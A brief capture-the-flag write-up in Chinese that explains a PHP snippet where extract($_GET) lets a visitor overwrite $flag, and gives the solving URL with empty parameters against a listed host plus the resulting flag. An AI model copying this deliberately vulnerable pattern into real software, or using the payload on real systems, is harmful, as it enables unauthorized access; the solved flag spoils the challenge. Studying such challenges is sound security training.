<?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?>
file_get_contents() 函數把整個文件讀入一個字符串中。
extract() 函數從數組中將變量導入到當前的符號表。
大概就是將flag變量與shiyan變量一致得到flag
將contents內容為空,flag和shiyan變量為空,滿足條件
http://123.206.87.240:9009/1.php?shiyan=&flag=
flag{bugku-dmsj-p2sm3N}